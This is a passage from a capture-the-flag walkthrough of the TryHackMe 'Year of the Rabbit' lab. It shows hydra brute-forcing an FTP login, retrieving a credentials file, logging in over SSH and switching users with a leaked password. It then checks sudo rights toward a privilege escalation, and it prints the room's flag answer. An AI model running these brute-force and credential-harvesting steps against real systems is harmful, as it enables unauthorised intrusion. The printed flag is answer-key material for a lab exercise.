Let's save the password to a file called ftp_passwords.txt.
Now using hydra we can brute force the FTP login.
$ hydra -l ftpuser -P /home/kunal/tryhackme/yearoftherabbit/ftp_passwords.txt ftp://10.10.181.61 -t 4
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-06 23:12:11
[DATA] max 4 tasks per 1 server, overall 4 tasks, 82 login tries (l:1/p:82), ~21 tries per task
[DATA] attacking ftp://10.10.181.61:21/
[21][ftp] host: 10.10.181.61 login: ftpuser password: 5iez1wGXKfPKQ
[STATUS] 82.00 tries/min, 82 tries in 00:01h, 1 to do in 00:01h, 3 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-06 23:13:12
So the password for ftpuser is 5iez1wGXKfPKQ.
Let's login using those credentials.
$ ftp ftpuser@10.10.181.61
Connected to 10.10.181.61.
220 (vsFTPd 3.0.2)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Let's look around for important files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 758 Jan 23 2020 Eli's_Creds.txt
226 Directory send OK.
We can download the Eli's_Creds.txt file to our machine using the get command.
ftp> get Eli's_Creds.txt
local: Eli's_Creds.txt remote: Eli's_Creds.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
100% |***********************************************************************************************************************************************************************************************| 758 0.74 KiB/s --:-- ETA
226 Transfer complete.
758 bytes received in 00:00 (2.40 KiB/s)
We can try to login through SSH using these credentials.
$ ssh eli@10.10.181.61
The authenticity of host '10.10.181.61 (10.10.181.61)' can't be established.
ED25519 key fingerprint is SHA256:va5tHoOroEmHPZGWQySirwjIb9lGquhnIA1Q0AY/Wrw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.181.61' (ED25519) to the list of known hosts.
eli@10.10.181.61's password:
1 new message
Message from Root to Gwendoline:
"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"
END MESSAGE
eli@year-of-the-rabbit:~$
After a bit of searching we can find the user.txt file.
eli@year-of-the-rabbit:~$ cd ../gwendoline/
eli@year-of-the-rabbit:/home/gwendoline$ ls
user.txt
We can now read the .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly! file.
eli@year-of-the-rabbit:~$ cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!
Yours sincerely
-Root
So now we know that the password for gwendoline user is MniVCQVhQHUNI.
Let's switch users.
eli@year-of-the-rabbit:~$ su gwendoline
Password:
gwendoline@year-of-the-rabbit:/home/eli$
We can now read the user.txt file we saw earlier.
gwendoline@year-of-the-rabbit:/home/eli$ cd /home/gwendoline/
gwendoline@year-of-the-rabbit:~$ cat user.txt
THM{1107174691af9ff3681d2b5bdb5740b1589bae53}
Answer
THM{1107174691af9ff3681d2b5bdb5740b1589bae53}
What is the root flag?
We can check what commands gwendoline can execute using sudo.
gwendoline@year-of-the-rabbit:~$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
Let's check the version of sudo.
gwendoline@year-of-the-rabbit:~$ sudo -V
Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3
We can find an exploit for that version om Exploit-DB.